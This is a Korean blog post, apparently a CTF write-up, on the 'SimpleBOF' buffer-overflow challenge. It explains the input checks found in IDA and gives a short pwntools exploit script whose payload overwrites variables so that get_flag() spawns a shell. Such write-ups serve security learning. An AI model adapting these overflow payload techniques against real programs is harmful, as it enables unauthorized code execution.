ii4gsp
SSG_CTF - SimpleBOF 본문
IDA로 파일을 열어보면 read()함수로 buf에 0x18 즉, 24byte만큼 입력을받는다.
각 변수가 4byte씩 차이가난다.
순서대로 조건을 맞춰주면 get_flag()함수가 실행되어 쉘을 획득한다.
flag_ptr은 get_flag()함수를 가리키고있다.
Exploit
from pwn import *
p = process('/home/ii4gsp/simpleBOF')
payload = ''
payload += '\x90' * 4
payload += 'FLAG'
payload += p32(0x080484cb)
payload += p32(0x31323334)
payload += p32(0xffffffff)
payload += p32(0xbc614e)
p.sendline(payload)
p.interactive()
'-1'로 전달하면 '-', '1'로 전달되어 2byte가 전달되어 0xffffffff으로 전달해야한다.
'시스템 해킹 > CTF' 카테고리의 다른 글
CSAW CTF 2018 Quals - get_it? (0) | 2020.03.03 |
---|---|
CSAW CTF 2018 Quals - bigboy (0) | 2020.03.03 |
[DEFCON 2015] r0pbaby (0) | 2020.02.20 |
[CODEGATE 2018] BaskinRobbins31 (0) | 2020.02.20 |
[CODEGATE 2018] betting (0) | 2020.02.13 |
Comments